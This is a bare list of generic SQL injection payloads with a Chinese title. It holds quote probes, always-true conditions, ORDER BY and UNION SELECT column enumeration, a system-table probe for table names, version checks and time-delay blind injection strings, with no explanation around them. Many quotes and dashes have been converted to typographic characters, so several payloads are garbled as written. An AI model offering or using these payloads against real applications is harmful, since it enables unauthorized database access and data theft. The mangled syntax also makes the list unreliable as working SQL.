001-通用SQL注入Payloads

# 通用SQL注入Payloads

“`sql
‘
”
`
“
,
”
“”
/
//
\
\\
;
‘ or ”
— or #
‘ OR ‘1
‘ OR 1 — –
” OR “” = ”
” OR 1 = 1 — –
‘ OR ” = ‘
‘=’
‘LIKE’
‘=0–+
OR 1=1
‘ OR ‘x’=’x
‘ AND id IS NULL; —
””””””’UNION SELECT ‘2
%00
/*…*/
+ addition, concatenate (or space in url)
|| (double pipe) concatenate
% wildcard attribute indicator

@variable local variable
@@variable global variable

# Numeric
AND 1
AND 0
AND true
AND false
1-false
1-true
1*56
-2

1′ ORDER BY 1–+
1′ ORDER BY 2–+
1′ ORDER BY 3–+

1′ ORDER BY 1,2–+
1′ ORDER BY 1,2,3–+

1′ GROUP BY 1,2,–+
1’ GROUP BY 1,2,3–+
‘ GROUP BY columnnames having 1=1 —

-1’ UNION SELECT 1,2,3–+
‘ UNION SELECT sum(columnname ) from tablename —

-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1

‘ AND MID(VERSION(),1,1) = ‘5’;

‘ and 1 in (select min(name) from sysobjects where xtype = ‘U’ and name > ‘.’) —

Finding the table name

Time-Based:
,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
‘;WAITFOR DELAY ‘0:0:30’–

Comments:

# Hash comment
/* C-style comment
— – SQL comment
;%00 Nullbyte
` Backtick

“`